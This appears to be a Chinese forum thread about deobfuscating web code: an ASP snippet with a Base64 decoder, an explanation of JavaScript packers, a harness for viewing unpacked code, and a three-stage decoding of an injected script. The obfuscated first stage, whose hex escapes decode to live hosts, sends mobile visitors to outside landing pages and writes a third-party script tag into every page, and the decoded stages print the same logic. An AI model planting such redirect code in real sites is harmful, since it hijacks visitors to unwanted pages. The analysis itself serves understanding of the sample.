在深山红叶PE工具箱里有个乱码读取工具,假如你说的的确是乱码,它一定可以读得出来的
webstorm可以格式化这种代码,不过代码里的各种变量都变成了a、b、c之类不可理解的名字。只能自己从头看了。
<%
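' Open the site's Access (Jet) database through ADO.
dim conn,connstr,database,rs1,DBPath
set conn=server.CreateObject("adodb.connection")
' A relative path given to Server.MapPath resolves against the directory of
' the running page, so album.asa is stored inside the web root.
' NOTE(review): the database then stays private only while the server refuses
' to serve *.asa files - confirm that, or keep the file outside the web root.
DBPath = Server.MapPath("album.asa")
' The connection string is built by concatenation; without the "&" operator
' this statement does not parse.
conn.open "provider=microsoft.jet.oledb.4.0; data source=" & DBPath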
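' Decode a Base64 string and return the result as a VBScript string, one
' chr() per decoded byte.
'   scrambled : Base64 text; trailing "=" padding is ignored.
'   returns   : the decoded string; "" for empty input or input that is
'               nothing but padding.
' NOTE(review): characters outside the Base64 alphabet are not rejected - an
' unmapped character below 128 decodes as 0, and a character code above 127
' indexes past Base64DecMap. Validate the input first if it is untrusted.
PUBLIC FUNCTION base64Decode(scrambled)
    dim BASE_64_MAP_INIT
    ' Standard Base64 alphabet; a character's position is its 6-bit value.
    BASE_64_MAP_INIT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    dim Base64EncMap(63)
    dim Base64DecMap(127)
    dim max, idx
    max = len(BASE_64_MAP_INIT)
    ' value -> character
    for idx = 0 to max - 1
        Base64EncMap(idx) = mid(BASE_64_MAP_INIT, idx + 1, 1)
    next
    ' character code -> value
    for idx = 0 to max - 1
        Base64DecMap(ASC(Base64EncMap(idx))) = idx
    next

    if len(scrambled) = 0 then
        base64Decode = ""
        exit function
    end if

    ' Strip trailing padding. The length check is a separate statement because
    ' VBScript's And does not short-circuit and mid(..., 0, 1) raises an error.
    dim realLen
    realLen = len(scrambled)
    do while realLen > 0
        if mid(scrambled, realLen, 1) <> "=" then exit do
        realLen = realLen - 1
    loop

    dim ret, ndx, by4, first, second, third, fourth
    ret = ""
    by4 = (realLen \ 4) * 4   ' number of characters that form complete groups of 4
    ndx = 1
    ' Each complete group of four 6-bit values yields three bytes.
    do while ndx <= by4
        first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
        second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
        third = Base64DecMap(asc(mid(scrambled, ndx+2, 1)))
        fourth = Base64DecMap(asc(mid(scrambled, ndx+3, 1)))
        ret = ret & chr( ((first * 4) AND 255) + ((second \ 16) AND 3))
        ret = ret & chr( ((second * 16) AND 255) + ((third \ 4) AND 15))
        ret = ret & chr( ((third * 64) AND 255) + (fourth AND 63))
        ndx = ndx + 4
    loop

    ' Trailing partial group: two characters give one byte, three give two.
    ' A single leftover character (ndx = realLen) carries no full byte and is skipped.
    if ndx < realLen then
        first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
        second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
        ret = ret & chr( ((first * 4) AND 255) + ((second \ 16) AND 3))
        if realLen MOD 4 = 3 then
            third = Base64DecMap(asc(mid(scrambled,ndx+2,1)))
            ret = ret & chr( ((second * 16) AND 255) + ((third \ 4) AND 15))
        end if
    end if

    base64Decode = ret
END FUNCTION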
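' Return the first line of config.asp from the directory of the running
' script; if that file is missing or empty, return the built-in notice.
' NOTE(review): callers presumably write the result into the page - confirm
' the first line of config.asp holds only the notice text and nothing sensitive.
function Copyright()
    Dim fileSysObj, tf, read, scriptPath
    ' Physical path of the requested script.
    scriptPath = Server.MapPath(Request.ServerVariables("PATH_INFO"))
    ' Keep everything up to and including the last "\" and append the file name.
    read = Left(scriptPath, InStrRev(scriptPath, "\")) & "config.asp"
    Set fileSysObj = CreateObject("Scripting.FileSystemObject")
    Copyright = "尊重作者劳动,请保留版权信息."
    If fileSysObj.FileExists(read) Then
        Set tf = fileSysObj.OpenTextFile(read, 1)   ' 1 = open for reading
        ' ReadLine raises an error on an empty file, so test for content first.
        If Not tf.AtEndOfStream Then Copyright = tf.ReadLine
        tf.Close
    End If
end function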
%>
你好,这个不用解密的,你已经解密过来了。
这是别人通过js混淆器加密后,你解密后的结果。
混淆器就是把一些变量替换了,可读性差,不直观。
\x69\x74\x65\x6D 这些字符都是变量的,不是真正的字符(\x69\x74\x65\x6D 是十六进制转义写法,逐个还原出来就是 item)。他的这些变量就像 a b c一样,只是长度字符大。比如我们定义 a=5;以后调用a就可以,同样道理,我定义\x69\x74\x65\x6D=5,以后调用\x69\x74\x65\x6D就可以了。
要想直观的,你可以逐一替换这些变量,那要一个一个找,或者批量替换掉。
首先你的加密后的代码有误,无法执行,应将return(c35?String.fromCharCode(c+29):
修改为return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):
c和35之间的部分你没复制出来(很可能是从 < 到 > 之间的内容被当成HTML标签吞掉了)
这种加密的算法的解密方法很简单
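<!-- Harness for inspecting what a packed script unpacks to: the result is displayed on the page rather than executed. -->
<html>
<body>
<div id="test"></div>
<script type="text/javascript">
// textContent shows the unpacked source as plain text. With innerHTML the
// browser would parse it as markup, so any tags or event-handler attributes
// in the unpacked text would become live elements on this page.
// The pasted unpacker still runs in this page, so open the file in a
// throw-away browser profile rather than your everyday one.
document.getElementById('test').textContent = 将需要破解的代码全部复制过来,注意你原来的代码不对,请通过替换先将上面说的那个错误改正
</script>
</body>
</html>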
将上面的代码保存成html文件,打开此文件即可看到加密前的内容,由于你的问题解密后是广告语,所以不在此处给出,自己试一下
第一步解码:
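// Stage 1: the sample in its obfuscated form. Every string literal and
// property name is written as \xNN hex escapes and collected in the table _$.
// Decoded, written defanged:
//   _$[13] = hxxp://baidu-google-sogou-soso-360-qq.mahjun[.]com/cdn/index.html?
//   _$[14] = hxxp://ios.adanzhuo[.]com/go3.php?
//   _$[16] = a <script> tag loading hxxp://js.adm.cnzz[.]net/s.php?sid=267174
// Behaviour: visitors whose user agent looks mobile are redirected to _$[13]
// or _$[14]; every visitor gets the _$[16] script tag written into the page.
// Desktop user agents skip both redirects, so viewing an affected page from a
// desktop browser does not reproduce the redirect.
var _$ = ["\x77\x66", "\x3f", "\x26\x74\x3d\x7a\x72", '\x54\x72\x69\x64\x65\x6e\x74', '\x50\x72\x65\x73\x74\x6f', '\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74', '\x47\x65\x63\x6b\x6f', '\x4b\x48\x54\x4d\x4c', '\x41\x6e\x64\x72\x6f\x69\x64', '\x4c\x69\x6e\x75\x78', '\x69\x50\x68\x6f\x6e\x65', '\x69\x50\x61\x64', '\x53\x61\x66\x61\x72\x69', "\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x2d\x67\x6f\x6f\x67\x6c\x65\x2d\x73\x6f\x67\x6f\x75\x2d\x73\x6f\x73\x6f\x2d\x33\x36\x30\x2d\x71\x71\x2e\x6d\x61\x68\x6a\x75\x6e\x2e\x63\x6f\x6d\x2f\x63\x64\x6e\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x3f", '\x68\x74\x74\x70\x3a\x2f\x2f\x69\x6f\x73\x2e\x61\x64\x61\x6e\x7a\x68\x75\x6f\x2e\x63\x6f\x6d\x2f\x67\x6f\x33\x2e\x70\x68\x70\x3f', '\x26\x74\x69\x64\x3d\x31\x35', "\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\'\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\'\x20\x63\x68\x61\x72\x73\x65\x74\x3d\'\x67\x62\x32\x33\x31\x32\'\x20\x73\x72\x63\x3d\'\x68\x74\x74\x70\x3a\x2f\x2f\x6a\x73\x2e\x61\x64\x6d\x2e\x63\x6e\x7a\x7a\x2e\x6e\x65\x74\x2f\x73\x2e\x70\x68\x70\x3f\x73\x69\x64\x3d\x32\x36\x37\x31\x37\x34\'\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"];
// window.document.getElementById("wf").src - the URL of the element with id "wf".
var a = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"](_$[0])["\x73\x72\x63"];
// Whatever follows "?" in that URL, plus "&t=zr", is forwarded to the redirect target.
src = a["\x73\x70\x6c\x69\x74"](_$[1])[0x1] + _$[2];
var b = {
    // User-agent sniffing; each flag is true when the marker string is present.
    versions: function() {
        var c = navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"],
            d = navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6f\x6e"];
        return {
            trident: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[3]) > -0x1,
            presto: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[4]) > -0x1,
            webKit: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[5]) > -0x1,
            gecko: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[6]) > -0x1 && c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[7]) == -0x1,
            mobile: !!c["\x6d\x61\x74\x63\x68"](/AppleWebKit.*Mobile.*/),
            ios: !!c["\x6d\x61\x74\x63\x68"](/\(i[^;]+;( U;)? CPU.+Mac OS X/),
            android: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[8]) > -0x1 || c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[9]) > -0x1,
            iPhone: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[10]) > -0x1,
            iPad: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[11]) > -0x1,
            webApp: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[12]) == -0x1
        }
    } (),
    language: (navigator["\x62\x72\x6f\x77\x73\x65\x72\x4c\x61\x6e\x67\x75\x61\x67\x65"] || navigator["\x6c\x61\x6e\x67\x75\x61\x67\x65"])["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]()
};
// b.versions.mobile && b.versions.android
if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false && b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x61\x6e\x64\x72\x6f\x69\x64"] != false) {
    window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[13] + src
// b.versions.mobile && (iPhone || iPad || iPod). versions defines no iPod key,
// so that operand is `undefined != false`, which is true: in effect every
// remaining mobile user agent takes this branch.
} else if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false && (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x68\x6f\x6e\x65"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x61\x64"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x6f\x64"] != false)) {
    window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[14] + src + _$[15]
};
// Runs for every visitor: writes the third-party <script> tag into the document.
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"](_$[16]);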
第二步解码:
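// Stage 2: the \xNN escapes decoded to plain text, structure unchanged.
// The table keeps all 17 entries so that the _$[n] indexes used below still
// line up with the obfuscated listing. Letter case follows the hex bytes
// exactly, because indexOf() and property lookups are case-sensitive.
// URLs are written defanged (hxxp, [.]) so this listing is for reading only.
var _$ = ["wf", "?", "&t=zr", 'Trident', 'Presto', 'AppleWebKit', 'Gecko', 'KHTML', 'Android', 'Linux', 'iPhone', 'iPad', 'Safari',
    "hxxp://baidu-google-sogou-soso-360-qq.mahjun[.]com/cdn/index.html?",
    'hxxp://ios.adanzhuo[.]com/go3.php?',
    '&tid=15',
    "<script type=\'text/javascript\' charset=\'gb2312\' src=\'hxxp://js.adm.cnzz[.]net/s.php?sid=267174\'></script>"
];
// URL of the element with id "wf"; its query string plus "&t=zr" is forwarded.
var a = window["document"]["getElementById"](_$[0])["src"];
src = a["split"](_$[1])[0x1] + _$[2];
var b = {
    // User-agent sniffing; each flag is true when the marker string is present.
    versions: function() {
        var c = navigator["userAgent"],
            d = navigator["appVersion"];
        return {
            trident: c["indexOf"](_$[3]) > -0x1,
            presto: c["indexOf"](_$[4]) > -0x1,
            webKit: c["indexOf"](_$[5]) > -0x1,
            gecko: c["indexOf"](_$[6]) > -0x1 && c["indexOf"](_$[7]) == -0x1,
            mobile: !!c["match"](/AppleWebKit.*Mobile.*/),
            ios: !!c["match"](/\(i[^;]+;( U;)? CPU.+Mac OS X/),
            android: c["indexOf"](_$[8]) > -0x1 || c["indexOf"](_$[9]) > -0x1,
            iPhone: c["indexOf"](_$[10]) > -0x1,
            iPad: c["indexOf"](_$[11]) > -0x1,
            webApp: c["indexOf"](_$[12]) == -0x1
        }
    } (),
    language: (navigator["browserLanguage"] || navigator["language"])["toLowerCase"]()
};
// Mobile Android user agents go to _$[13].
if (b["versions"]["mobile"] != false && b["versions"]["android"] != false) {
    window["location"]["href"] = _$[13] + src
// versions has no iPod key, so `undefined != false` is true and every other
// mobile user agent goes to _$[14].
} else if (b["versions"]["mobile"] != false && (b["versions"]["iPhone"] != false || b["versions"]["iPad"] != false || b["versions"]["iPod"] != false)) {
    window["location"]["href"] = _$[14] + src + _$[15]
};
// Runs for every visitor: writes the third-party <script> tag into the document.
window["document"]["writeln"](_$[16]);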
第三步解码
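// Stage 3: table lookups replaced by their values and bracket access by dot
// access, giving the script's readable form. String values are the decoded
// bytes of the obfuscated listing's table; URLs are written defanged
// (hxxp, [.]) so this listing is for reading only.
// URL of the element with id "wf"; its query string plus "&t=zr" is forwarded.
var a = document.getElementById('wf').src;
src = a.split('?')[1] + '&t=zr';
var b = {
    // User-agent sniffing; indexOf() is case-sensitive, so the markers keep
    // the exact case of the original strings.
    versions: function() {
        var c = navigator.userAgent,
            d = navigator.appVersion;
        return {
            trident: c.indexOf('Trident') > -1,
            presto: c.indexOf('Presto') > -1,
            webKit: c.indexOf('AppleWebKit') > -1,
            gecko: c.indexOf('Gecko') > -1 && c.indexOf('KHTML') == -1,
            mobile: !!c.match(/AppleWebKit.*Mobile.*/),
            ios: !!c.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
            android: c.indexOf('Android') > -1 || c.indexOf('Linux') > -1,
            iPhone: c.indexOf('iPhone') > -1,
            iPad: c.indexOf('iPad') > -1,
            webApp: c.indexOf('Safari') == -1
        }
    } (),
    language: (navigator.browserLanguage || navigator.language).toLowerCase()
};
// Mobile Android user agents are sent to the first landing page.
if (b["versions"]["mobile"] != false && b["versions"]["android"] != false) {
    location.href = 'hxxp://baidu-google-sogou-soso-360-qq.mahjun[.]com/cdn/index.html?' + src
// versions has no iPod key, so `undefined != false` is true and every other
// mobile user agent is sent to the second landing page.
} else if (b["versions"]["mobile"] != false && (b["versions"]["iPhone"] != false || b["versions"]["iPad"] != false || b["versions"]["iPod"] != false)) {
    location.href = 'hxxp://ios.adanzhuo[.]com/go3.php?' + src + '&tid=15'
};
// Runs for every visitor, desktop included: writes a third-party <script> tag.
document.writeln('<script type=\'text/javascript\' charset=\'gb2312\' src=\'hxxp://js.adm.cnzz[.]net/s.php?sid=267174\'></script>');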